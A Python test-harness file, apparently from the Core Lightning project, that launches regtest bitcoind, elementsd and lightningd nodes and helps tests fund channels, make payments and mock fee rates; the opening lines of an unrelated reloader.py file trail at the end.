Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
logging.debug("Calling {name} with arguments {args}".format(
name=name,
args=args
))
res = proxy._call(name, *args)
logging.debug("Result for {name} call: {res}".format(
name=name,
res=res,
))
return res
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'bitcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'bitcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-txindex',
'-nowallet',
'-addresstype=bech32'
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
self.conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(self.conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
try:
self.rpc.createwallet("lightningd-tests")
except JSONRPCError:
self.rpc.loadwallet("lightningd-tests")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
proxy.start()
return proxy
# wait_for_mempool can be used to wait for the mempool before generating blocks:
# True := wait for at least 1 transation
# int > 0 := wait for at least N transactions
# 'tx_id' := wait for one transaction id given as a string
# ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
mempool = self.rpc.getrawmempool()
logging.debug("Generating {numblocks}, confirming {lenmempool} transactions: {mempool}".format(
numblocks=numblocks,
mempool=mempool,
lenmempool=len(mempool),
))
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height=[height] and re-mine all mempool
transactions into [height + shift], where shift >= 0. Returns hashes of generated
blocks.
Note that tx's that become invalid at [height] (because coin maturity, locktime
etc.) are removed from mempool. The length of the new chain will be original + 1
OR original + [shift], whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1, use [height]=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can be pulled
forward to h1.
2. Set [height]=h2 and [shift]= h1-h2
"""
hashes = []
fee_delta = 1000000
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
final_len = height + shift if height + shift > orig_len else 1 + orig_len
# TODO: raise error for insane args?
self.rpc.invalidateblock(old_hash)
self.wait_for_log(r'InvalidChainFound: invalid block=.* height={}'.format(height))
memp = self.rpc.getrawmempool()
if shift == 0:
hashes += self.generate_block(1 + final_len - height)
else:
for txid in memp:
# lower priority (to effective feerate=0) so they are not mined
self.rpc.prioritisetransaction(txid, None, -fee_delta)
hashes += self.generate_block(shift)
for txid in memp:
# restore priority so they are mined
self.rpc.prioritisetransaction(txid, None, fee_delta)
hashes += self.generate_block(1 + final_len - (height + shift))
self.wait_for_log(r'UpdateTip: new best=.* height={}'.format(final_len))
return hashes
def getnewaddress(self):
return self.rpc.getnewaddress()
class ElementsD(BitcoinD):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
config = BITCOIND_CONFIG.copy()
if 'regtest' in config:
del config['regtest']
config['chain'] = 'liquid-regtest'
BitcoinD.__init__(self, bitcoin_dir, rpcport)
self.cmd_line = [
'elementsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-nowallet',
'-validatepegin=0',
'-con_blocksubsidy=5000000000',
]
conf_file = os.path.join(bitcoin_dir, 'elements.conf')
config['rpcport'] = self.rpcport
BITCOIND_REGTEST = {'rpcport': self.rpcport}
write_config(conf_file, config, BITCOIND_REGTEST, section_name='liquid-regtest')
self.conf_file = conf_file
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.prefix = 'elementsd'
def getnewaddress(self):
"""Need to get an address and then make it unconfidential
"""
addr = self.rpc.getnewaddress()
info = self.rpc.getaddressinfo(addr)
return info['unconfidential']
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': '{}'.format("true" if DEPRECATED_APIS
else "false"),
'network': TEST_NETWORK,
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
# Make sure we don't touch any existing config files in the user's $HOME
'bitcoin-datadir': lightning_dir,
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(os.path.join(lightning_dir, TEST_NETWORK)):
os.makedirs(os.path.join(lightning_dir, TEST_NETWORK))
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, TEST_NETWORK, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-fast-gossip'] = None
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self, stdin=None, stdout=None, stderr=None,
wait_for_initialized=True):
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self, stdin, stdout, stderr)
if wait_for_initialized:
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class PrettyPrintingLightningRpc(LightningRpc):
"""A version of the LightningRpc that pretty-prints calls and results.
Useful when debugging based on logs, and less painful to the
eyes. It has some overhead since we re-serialize the request and
result to json in order to pretty print it.
"""
def call(self, method, payload=None):
id = self.next_id
self.logger.debug(json.dumps({
"id": id,
"method": method,
"params": payload
}, indent=2))
res = LightningRpc.call(self, method, payload)
self.logger.debug(json.dumps({
"id": id,
"result": res
}, indent=2))
return res
class LightningNode(object):
def __init__(self, node_id, lightning_dir, bitcoind, executor, valgrind, may_fail=False,
may_reconnect=False,
allow_broken_log=False,
allow_warning=False,
allow_bad_gossip=False,
db=None, port=None, disconnect=None, random_hsm=None, options=None,
**kwargs):
self.bitcoin = bitcoind
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
self.allow_broken_log = allow_broken_log
self.allow_bad_gossip = allow_bad_gossip
self.allow_warning = allow_warning
self.db = db
# Assume successful exit
self.rc = 0
socket_path = os.path.join(lightning_dir, TEST_NETWORK, "lightning-rpc").format(node_id)
self.rpc = PrettyPrintingLightningRpc(socket_path, self.executor)
self.daemon = LightningD(
lightning_dir, bitcoindproxy=bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
self.daemon.disconnect_file = os.path.join(lightning_dir, TEST_NETWORK, "dev_disconnect")
with open(self.daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
self.daemon.opts["dev-disconnect"] = "dev_disconnect"
if DEVELOPER:
self.daemon.opts["dev-fail-on-subdaemon-fail"] = None
# Don't run --version on every subdaemon if we're valgrinding and slow.
if SLOW_MACHINE and VALGRIND:
self.daemon.opts["dev-no-version-checks"] = None
if os.getenv("DEBUG_SUBD"):
self.daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if valgrind:
self.daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
else:
# Under valgrind, scanning can access uninitialized mem.
self.daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if not may_reconnect:
self.daemon.opts["dev-no-reconnect"] = None
if options is not None:
self.daemon.opts.update(options)
dsn = db.get_dsn()
if dsn is not None:
self.daemon.opts['wallet'] = dsn
if valgrind:
self.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*python*,*bitcoin-cli*,*elements-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(self.daemon.lightning_dir)
]
# Reduce precision of errors, speeding startup and reducing memory greatly:
if SLOW_MACHINE:
self.daemon.cmd_prefix += ['--read-inline-info=no']
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity=FUNDAMOUNT, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or wait_for_announce:
self.bitcoin.generate_block(1)
if wait_for_announce:
self.bitcoin.generate_block(5)
if confirm or wait_for_announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit"):
addr = self.rpc.newaddr(addrtype)[addrtype]
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {} CONFIRMED'.format(txid))
return addr, txid
def fundbalancedchannel(self, remote_node, total_capacity, announce=True):
'''
Creates a perfectly-balanced channel, as all things should be.
'''
if isinstance(total_capacity, Millisatoshi):
total_capacity = int(total_capacity.to_satoshi())
else:
total_capacity = int(total_capacity)
self.fundwallet(total_capacity + 10000)
if remote_node.config('experimental-dual-fund'):
remote_node.fundwallet(total_capacity + 10000)
# We cut the total_capacity in half, since the peer's
# expected to contribute that same amount
chan_capacity = total_capacity // 2
total_capacity = chan_capacity * 2
else:
chan_capacity = total_capacity
self.rpc.connect(remote_node.info['id'], 'localhost', remote_node.port)
# Make sure the fundchannel is confirmed.
num_tx = len(self.bitcoin.rpc.getrawmempool())
tx = self.rpc.fundchannel(remote_node.info['id'], chan_capacity, feerate='slow', minconf=0, announce=announce, push_msat=Millisatoshi(chan_capacity * 500))['tx']
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
self.bitcoin.generate_block(1)
# Generate the scid.
# NOTE This assumes only the coinbase and the fundchannel is
# confirmed in the block.
outnum = get_tx_p2wsh_outnum(self.bitcoin, tx, total_capacity)
if outnum is None:
raise ValueError("no outnum found. capacity {} tx {}".format(total_capacity, tx))
return '{}x1x{}'.format(self.bitcoin.rpc.getblockcount(), outnum)
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query):
return self.db.query(query)
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, TEST_NETWORK, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def is_synced_with_bitcoin(self, info=None):
if info is None:
info = self.rpc.getinfo()
return 'warning_bitcoind_sync' not in info and 'warning_lightningd_sync' not in info
def start(self, wait_for_bitcoind_sync=True, stderr=None):
self.daemon.start(stderr=stderr)
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
if wait_for_bitcoind_sync and not self.is_synced_with_bitcoin(self.info):
wait_for(lambda: self.is_synced_with_bitcoin())
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
self.rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if self.rc is None:
self.rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if self.rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(self.rc))
else:
return self.rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True, announce_channel=True):
warnings.warn("LightningNode.fund_channel is deprecated in favor of "
"LightningNode.fundchannel", category=DeprecationWarning)
return self.fundchannel(l2, amount, wait_for_active, announce_channel)
def fundchannel(self, l2, amount=FUNDAMOUNT, wait_for_active=True,
announce_channel=True, **kwargs):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['bech32']
def has_funds_on_addr(addr):
"""Check if the given address has funds in the internal wallet.
"""
outs = self.rpc.listfunds()['outputs']
addrs = [o['address'] for o in outs]
return addr in addrs
# We should not have funds on that address yet, we just generated it.
assert(not has_funds_on_addr(addr))
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
self.bitcoin.generate_block(1)
# Now we should.
wait_for(lambda: has_funds_on_addr(addr))
# Now go ahead and open a channel
res = self.rpc.fundchannel(l2.info['id'], amount,
announce=announce_channel,
**kwargs)
wait_for(lambda: res['txid'] in self.bitcoin.rpc.getrawmempool())
self.bitcoin.generate_block(1)
# Hacky way to find our output.
scid = "{}x1x{}".format(self.bitcoin.rpc.getblockcount(),
get_tx_p2wsh_outnum(self.bitcoin, res['tx'], amount))
if wait_for_active:
self.wait_channel_active(scid)
l2.wait_channel_active(scid)
return scid, res
def subd_pid(self, subd, peerid=None):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
if peerid:
ex = re.compile(r'{}-.*{}.*: pid ([0-9]*),'
.format(peerid, subd))
else:
ex = re.compile('{}-.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def get_channel_id(self, other):
"""Get the channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels(chanid)['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=30):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
# This helper waits for all HTLCs to settle
# `scids` can be a list of strings. If unset wait on all channels.
def wait_for_htlcs(self, scids=None):
peers = self.rpc.listpeers()['peers']
for p, peer in enumerate(peers):
if 'channels' in peer:
for c, channel in enumerate(peer['channels']):
if scids is not None and channel['short_channel_id'] not in scids:
continue
if 'htlcs' in channel:
wait_for(lambda: len(self.rpc.listpeers()['peers'][p]['channels'][c]['htlcs']) == 0)
# This sends money to a directly connected peer
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
# check we are connected
dst_id = dst.info['id']
assert len(self.rpc.listpeers(dst_id).get('peers')) == 1
# make an invoice
rhash = dst.rpc.invoice(amt, label, label)['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst_id,
'delay': 5,
'channel': '1x1x1' # note: can be bogus for 1-hop direct payments
}
# sendpay is async now
self.rpc.sendpay([routestep], rhash)
# wait for sendpay to comply
result = self.rpc.waitsendpay(rhash)
assert(result.get('status') == 'complete')
# This helper sends all money to a peer until even 1 msat can't get through.
def drain(self, peer):
total = 0
msat = 4294967295 # Max payment size in some configs
while msat != 0:
try:
logging.debug("Drain step with size={}".format(msat))
self.pay(peer, msat)
total += msat
except RpcError as e:
logging.debug("Got an exception while draining channel: {}".format(e))
msat //= 2
logging.debug("Draining complete after sending a total of {}msats".format(total))
return total
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [3, 'CONSERVATIVE']:
feerate = feerates[1] * 4
elif params == [4, 'ECONOMICAL']:
feerate = feerates[2] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[3] * 4
else:
warnings.warn("Don't have a feerate set for {}/{}.".format(
params[0], params[1],
))
feerate = 42
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda:
self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 4)
# force new feerates by restarting and thus skipping slow smoothed process
# Note: testnode must be created with: opts={'may_reconnect': True}
def force_feerates(self, rate):
assert(self.may_reconnect)
self.set_feerates([rate] * 4, False)
self.restart()
self.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
assert(self.rpc.feerates('perkw')['perkw']['opening'] == rate)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def query_gossip(self, querytype, *args, filters=[]):
"""Generate a gossip query, feed it into this node and get responses
in hex"""
query = subprocess.run(['devtools/mkquery',
querytype] + [str(a) for a in args],
check=True,
timeout=TIMEOUT,
stdout=subprocess.PIPE).stdout.strip()
out = subprocess.run(['devtools/gossipwith',
'--timeout-after={}'.format(int(math.sqrt(TIMEOUT) + 1)),
'{}@localhost:{}'.format(self.info['id'],
self.port),
query],
check=True,
timeout=TIMEOUT, stdout=subprocess.PIPE).stdout
def passes_filters(hmsg, filters):
for f in filters:
if hmsg.startswith(f):
return False
return True
msgs = []
while len(out):
length = struct.unpack('>H', out[0:2])[0]
hmsg = out[2:2 + length].hex()
if passes_filters(hmsg, filters):
msgs.append(out[2:2 + length].hex())
out = out[2 + length:]
return msgs
def config(self, config_name):
try:
opt = self.rpc.listconfigs(config_name)
return opt[config_name]
except RpcError:
return None
@contextmanager
def flock(directory: Path):
"""A fair filelock, based on atomic fs operations.
"""
if not isinstance(directory, Path):
directory = Path(directory)
d = directory / Path(".locks")
os.makedirs(str(d), exist_ok=True)
fname = None
while True:
# Try until we find a filename that doesn't exist yet.
try:
fname = d / Path("lock-{}".format(time.time()))
fd = os.open(str(fname), flags=os.O_CREAT | os.O_EXCL)
os.close(fd)
break
except FileExistsError:
time.sleep(0.1)
# So now we have a position in the lock, let's check if we are the
# next one to go:
while True:
files = sorted([f.resolve() for f in d.iterdir() if f.is_file()])
# We're queued, so it should at least have us.
assert len(files) >= 1
if files[0] == fname:
break
time.sleep(0.1)
# We can continue
yield fname
# Remove our file, so the next one can go ahead.
fname.unlink()
class Throttler(object):
"""Throttles the creation of system-processes to avoid overload.
There is no reason to overload the system with too many processes
being spawned or run at the same time. It causes timeouts by
aggressively preempting processes and swapping if the memory limit is
reached. In order to reduce this loss of performance we provide a
`wait()` method which will serialize the creation of processes, but
also delay if the system load is too high.
Notice that technically we are throttling too late, i.e., we react
to an overload, but chances are pretty good that some other
already running process is about to terminate, and so the overload
is short-lived. We throttle when the process object is first
created, not when restarted, in order to avoid delaying running
tests, which could cause more timeouts.
"""
def __init__(self, directory: str, target: float = 90):
"""If specified we try to stick to a load of target (in percent).
"""
self.target = target
self.current_load = self.target # Start slow
psutil.cpu_percent() # Prime the internal load metric
self.directory = directory
def wait(self):
start_time = time.time()
with flock(self.directory):
# We just got the lock, assume someone else just released it
self.current_load = 100
while self.load() >= self.target:
time.sleep(1)
self.current_load = 100 # Back off slightly to avoid triggering right away
print("Throttler delayed startup for {} seconds".format(time.time() - start_time))
def load(self):
"""An exponential moving average of the load
"""
decay = 0.5
load = psutil.cpu_percent()
self.current_load = decay * load + (1 - decay) * self.current_load
return self.current_load
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, request, testname, bitcoind, executor, directory,
db_provider, node_cls, throttler):
if request.node.get_closest_marker("slow_test") and SLOW_MACHINE:
self.valgrind = False
else:
self.valgrind = VALGRIND
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
self.db_provider = db_provider
self.node_cls = node_cls
self.throttler = throttler
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'allow_broken_log',
'allow_warning',
'may_reconnect',
'random_hsm',
'feerates',
'wait_for_bitcoind_sync',
'allow_bad_gossip'
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_node_id(self):
"""Generate a unique numeric ID for a lightning node
"""
with self.lock:
node_id = self.next_id
self.next_id += 1
return node_id
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(
self.get_node, options=cli_opts,
node_id=self.get_node_id(), **node_opts
))
return [j.result() for j in jobs]
def get_node(self, node_id=None, options=None, dbfile=None,
feerates=(15000, 11000, 7500, 3750), start=True,
wait_for_bitcoind_sync=True, may_fail=False,
expect_fail=False, cleandir=True, **kwargs):
self.throttler.wait()
node_id = self.get_node_id() if not node_id else node_id
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if cleandir and os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
# Get the DB backend DSN we should be using for this test and this
# node.
db = self.db_provider.get_db(os.path.join(lightning_dir, TEST_NETWORK), self.testname, node_id)
node = self.node_cls(
node_id, lightning_dir, self.bitcoind, self.executor, self.valgrind, db=db,
port=port, options=options, may_fail=may_fail or expect_fail,
**kwargs
)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, TEST_NETWORK,
'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
# Capture stderr if we're failing
if expect_fail:
stderr = subprocess.PIPE
else:
stderr = None
node.start(wait_for_bitcoind_sync, stderr=stderr)
except Exception:
if expect_fail:
return node
node.daemon.stop()
raise
return node
def join_nodes(self, nodes, fundchannel=True, fundamount=FUNDAMOUNT, wait_for_announce=False, announce_channels=True) -> None:
"""Given nodes, connect them in a line, optionally funding a channel"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
connections = [(nodes[i], nodes[i + 1]) for i in range(len(nodes) - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log(r'{}-.*-chan#[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return
bitcoind = nodes[0].bitcoin
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
txids = []
for src, dst in connections:
txids.append(src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)['txid'])
wait_for(lambda: set(txids).issubset(set(bitcoind.rpc.getrawmempool())))
# Confirm all channels and wait for them to become usable
bitcoind.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
scids.append(scid)
# Wait for all channels to be active (locally)
for i, n in enumerate(scids):
nodes[i].wait_channel_active(scids[i])
nodes[i + 1].wait_channel_active(scids[i])
if not wait_for_announce:
return
bitcoind.generate_block(5)
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
nodes[0].wait_channel_active(scids[-1])
nodes[-1].wait_channel_active(scids[0])
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
def line_graph(self, num_nodes, fundchannel=True, fundamount=FUNDAMOUNT, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
nodes = self.get_nodes(num_nodes, opts=opts)
self.join_nodes(nodes, fundchannel, fundamount, wait_for_announce, announce_channels)
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
err_msgs = []
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not self.valgrind and DEVELOPER:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
unexpected_fail = True
err_msgs.append("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail, err_msgs
|
reloader.py
|
""" The reloader that autodetects file changes for debugging
Since we ditched the old werkzeug server, this is the code that allowed it to
